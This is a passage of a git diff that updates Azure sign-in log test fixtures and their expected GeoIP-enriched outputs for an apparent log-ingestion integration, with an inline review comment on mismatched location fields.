"{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\",\\\"apiVersion\\\":\\\"audit.k8s.io/v1\\\",\\\"level\\\":\\\"Metadata\\\",\\\"auditID\\\":\\\"22af12c3-a1fe-4f2c-99a9-3cdde671dbfe\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\",\"stream\":\"stdout\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json index bbd41afb415..e65b5cdaed5 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json 
@@ -21,7 +21,7 @@ }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:36.351618100Z", + "ingested": "2021-12-09T13:30:58.981445700Z", "original": "{\"Level\":4,\"category\":\"ManagedIdentitySignInLogs\",\"correlationId\":\"22222222-92d0-4887-9ead-46258539a699\",\"durationMs\":0,\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-b540-4792-a2a2-81818990a95b\",\"correlationId\":\"22222222-92d0-4887-9ead-46258539a699\",\"createdDateTime\":\"2021-01-23T20:44:29.7688982+00:00\",\"flaggedForReview\":false,\"id\":\"22222222-0b57-4b77-bf1a-317a88591a00\",\"ipAddress\":\"\",\"isInteractive\":false,\"location\":{\"city\":\"\",\"countryOrRegion\":\"\",\"geoCoordinates\":{\"latitude\":0,\"longitude\":0},\"state\":\"\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Windows Azure Service Management API\",\"resourceId\":\"22222222-ba00-4fd7-ba43-dac1f8f63013\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-864d-4e00-9882-ff649530f186\",\"servicePrincipalName\":\"ASC provisioning Dependency agent for Linux\",\"status\":{\"errorCode\":0},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/tenantId/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"tenantId\",\"time\":\"2021-01-23T20:44:29.7688982Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log index 9d4e5f92861..de22f9d88e8 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log 
@@ -1 +1 @@ -{"Level":4,"callerIpAddress":"11.22.33.44","category":"NonInteractiveUserSignInLogs","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","durationMs":0,"identity":"Hello World","location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Microsoft Teams","appId":"22222222-bce4-4aaf-ab1b-5451cc387264","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":0,"conditionsSatisfied":7,"displayName":"01 - Require Windows Hybrid AD Joined Device","enforcedGrantControls":["RequireDomainJoinedDevice"],"enforcedSessionControls":[],"id":"22222222-b7da-4d9e-ae41-779c5c256ac8","result":"success"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"05 - MFA für Gäste","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-e960-42e6-ae3a-355df7e475d5","result":"notApplied"},{"conditionsNotSatisfied":12,"conditionsSatisfied":19,"displayName":"02 - Mobile Device Policy","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-877a-4100-a0cf-5a589f2da3ad","result":"notApplied"},{"conditionsNotSatisfied":16,"conditionsSatisfied":3,"displayName":"04 - Block Legacy Authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8e59-4055-87b1-b54a055a7ca5","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"06 - Enterprise Apps","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-39cb-4ec4-8ed2-ac1352d260ba","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"03 - Require MFA for Admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-ea2f-4502-abb7-3689a1b0da41","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"07 - PowerAutomate 
Pilot","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8b95-43cb-8e7d-69e34704ab56","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02c - Mobile Device Policy Device Compliance","enforcedGrantControls":["RequireCompliantDevice"],"enforcedSessionControls":[],"id":"22222222-ff75-460a-800c-7fe88bd9c877","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02d - MacOS","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-9886-4897-b2e2-a096cd37bac3","result":"notApplied"}],"authenticationDetails":[],"authenticationProcessingDetails":[{"key":"Is Client Capable","value":"True"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"autonomousSystemNumber":3320,"clientAppUsed":"Mobile Apps and Desktop clients","conditionalAccessStatus":"success","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","createdDateTime":"2021-07-30T11:20:59.7789167+00:00","crossTenantAccessType":"none","deviceDetail":{"browser":"Edge 18.1836","deviceId":"22222222-1e7a-44dc-8bc9-5736d8e2b063","displayName":"ABCDEFG","operatingSystem":"Windows 10","trustType":"Hybrid Azure AD joined"},"flaggedForReview":false,"homeTenantId":"22222222-902d-4dea-8026-5a790862fede","id":"22222222-fb7b-4f83-bf74-3876f9ef3900","ipAddress":"11.22.33.44","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789123456},"state":"Niedersachsen"},"networkLocationDetails":[{"networkNames":["Hannover"],"networkType":"trustedNamedLocation"}],"originalRequestId":"22222222-fb7b-4f83-bf74-3876f9ef3900","privateLinkDetails":{},"processingTimeInMilliseconds":65,"resourceDisplayName":"Office 365 Exchange 
Online","resourceId":"22222222-0000-0ff1-ce00-000000000000","resourceTenantId":"22222222-902d-4dea-8026-5a790862fede","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","ssoExtensionVersion":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363","userDisplayName":"Hello World","userId":"22222222-473d-4f4e-a526-ff54e71afe84","userPrincipalName":"hello.world@company.de","userType":"Member"},"resourceId":"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"22222222-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:20:59.7789167Z"} \ No newline at end of file +{"Level":4,"callerIpAddress":"81.2.69.144","category":"NonInteractiveUserSignInLogs","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","durationMs":0,"identity":"Hello World","location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Microsoft Teams","appId":"22222222-bce4-4aaf-ab1b-5451cc387264","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":0,"conditionsSatisfied":7,"displayName":"01 - Require Windows Hybrid AD Joined Device","enforcedGrantControls":["RequireDomainJoinedDevice"],"enforcedSessionControls":[],"id":"22222222-b7da-4d9e-ae41-779c5c256ac8","result":"success"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"05 - MFA für Gäste","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-e960-42e6-ae3a-355df7e475d5","result":"notApplied"},{"conditionsNotSatisfied":12,"conditionsSatisfied":19,"displayName":"02 - Mobile Device 
Policy","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-877a-4100-a0cf-5a589f2da3ad","result":"notApplied"},{"conditionsNotSatisfied":16,"conditionsSatisfied":3,"displayName":"04 - Block Legacy Authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8e59-4055-87b1-b54a055a7ca5","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"06 - Enterprise Apps","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-39cb-4ec4-8ed2-ac1352d260ba","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"03 - Require MFA for Admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-ea2f-4502-abb7-3689a1b0da41","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"07 - PowerAutomate Pilot","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8b95-43cb-8e7d-69e34704ab56","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02c - Mobile Device Policy Device Compliance","enforcedGrantControls":["RequireCompliantDevice"],"enforcedSessionControls":[],"id":"22222222-ff75-460a-800c-7fe88bd9c877","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02d - MacOS","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-9886-4897-b2e2-a096cd37bac3","result":"notApplied"}],"authenticationDetails":[],"authenticationProcessingDetails":[{"key":"Is Client Capable","value":"True"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"autonomousSystemNumber":3320,"clientAppUsed":"Mobile Apps and Desktop 
clients","conditionalAccessStatus":"success","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","createdDateTime":"2021-07-30T11:20:59.7789167+00:00","crossTenantAccessType":"none","deviceDetail":{"browser":"Edge 18.1836","deviceId":"22222222-1e7a-44dc-8bc9-5736d8e2b063","displayName":"ABCDEFG","operatingSystem":"Windows 10","trustType":"Hybrid Azure AD joined"},"flaggedForReview":false,"homeTenantId":"22222222-902d-4dea-8026-5a790862fede","id":"22222222-fb7b-4f83-bf74-3876f9ef3900","ipAddress":"81.2.69.144","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789123456},"state":"Niedersachsen"},"networkLocationDetails":[{"networkNames":["Hannover"],"networkType":"trustedNamedLocation"}],"originalRequestId":"22222222-fb7b-4f83-bf74-3876f9ef3900","privateLinkDetails":{},"processingTimeInMilliseconds":65,"resourceDisplayName":"Office 365 Exchange Online","resourceId":"22222222-0000-0ff1-ce00-000000000000","resourceTenantId":"22222222-902d-4dea-8026-5a790862fede","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","ssoExtensionVersion":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363","userDisplayName":"Hello World","userId":"22222222-473d-4f4e-a526-ff54e71afe84","userPrincipalName":"hello.world@company.de","userType":"Member"},"resourceId":"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"22222222-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:20:59.7789167Z"} \ No newline at end of file 
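Review bot: After the swap to 81.2.69.144 the fixture's own enrichment fields no longer agree with what GeoIP derives from that address: the input still carries `"autonomousSystemNumber":3320` and `"location":{"city":"Hannover","countryOrRegion":"DE",...}`, while the regenerated expected output in the next hunk reports `source.as.number` 20712 and a `source.geo` block in GB/Abingdon. From the expected file alone a reader cannot tell whether the pipeline's geoip processor overrides a mapped `autonomousSystemNumber` or whether that field is simply never mapped; aligning the fixture's `autonomousSystemNumber` and `location` values with the test address, or stating in the data stream's documentation that these ECS fields are GeoIP-derived rather than taken from the event, would remove the ambiguity. The same DE/Hannover `location` stays in test-service-principal.log, which receives the same address in its hunk below. Both input files are also still written without a trailing newline, as the `\ No newline at end of file` marker on both sides shows.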
diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json
index c68d4594b3c..a699faee34e 100644
--- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json
+++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json
@@ -7,15 +7,24 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "France",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 2.3387,
- "lat": 48.8582
- },
- "country_iso_code": "FR"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
+ },
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
 },
- "address": "11.22.33.44",
- "ip": "11.22.33.44"
+ "address": "81.2.69.144",
+ "ip": "81.2.69.144"
 },
 "tags": [
 "preserve_original_event"
@@ -38,16 +47,16 @@ }, "related": { "ip": [ - "11.22.33.44" + "81.2.69.144" ] }, "client": { - "ip": "11.22.33.44" + "ip": "81.2.69.144" }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:36.565325400Z", - "original": "{\"Level\":4,\"callerIpAddress\":\"11.22.33.44\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA für Gäste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 
- Require MFA for Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD 
joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"11.22.33.44\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}", + "ingested": "2021-12-09T13:30:59.123869500Z", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in 
activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA für Gäste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 - Require MFA for Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate 
Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD 
joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}", "kind": "event", "action": "Sign-in activity", "id": "22222222-fb7b-4f83-bf74-3876f9ef3900", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log index 5710f7adcf7..a0265a42067 100644 
--- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log
+++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log
@@ -1 +1 @@ -{"Level":4,"callerIpAddress":"11.22.33.44","category":"ServicePrincipalSignInLogs","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","durationMs":0,"location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appId":"22222222-ddf2-4ab6-b25f-f23d5d614338","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","createdDateTime":"2021-07-30T11:29:26.6733668+00:00","crossTenantAccessType":"none","flaggedForReview":false,"id":"22222222-5ec0-4795-bf9f-9017bcc32f00","ipAddress":"11.22.33.44","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789012345},"state":"Niedersachsen"},"processingTimeInMilliseconds":0,"resourceDisplayName":"Configuration Manager Microservice","resourceId":"22222222-c916-4293-8373-d584996f60ae","riskDetail":"none","riskLevelAggregated":"low","riskLevelDuringSignIn":"low","riskState":"none","servicePrincipalId":"22222222-4677-43b4-a1dc-ecb3230e9350","servicePrincipalName":"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0","status":{"errorCode":7000222},"tokenIssuerType":"AzureAD","userId":null},"resourceId":"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"7000222","tenantId":"1111111111-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:29:26.6733668Z"} \ No newline at end of file +{"Level":4,"callerIpAddress":"81.2.69.144","category":"ServicePrincipalSignInLogs","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","durationMs":0,"location":"DE","operationName":"Sign-in 
activity","operationVersion":"1.0","properties":{"appId":"22222222-ddf2-4ab6-b25f-f23d5d614338","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","createdDateTime":"2021-07-30T11:29:26.6733668+00:00","crossTenantAccessType":"none","flaggedForReview":false,"id":"22222222-5ec0-4795-bf9f-9017bcc32f00","ipAddress":"81.2.69.144","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789012345},"state":"Niedersachsen"},"processingTimeInMilliseconds":0,"resourceDisplayName":"Configuration Manager Microservice","resourceId":"22222222-c916-4293-8373-d584996f60ae","riskDetail":"none","riskLevelAggregated":"low","riskLevelDuringSignIn":"low","riskState":"none","servicePrincipalId":"22222222-4677-43b4-a1dc-ecb3230e9350","servicePrincipalName":"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0","status":{"errorCode":7000222},"tokenIssuerType":"AzureAD","userId":null},"resourceId":"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"7000222","tenantId":"1111111111-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:29:26.6733668Z"} \ No newline at end of file diff --git 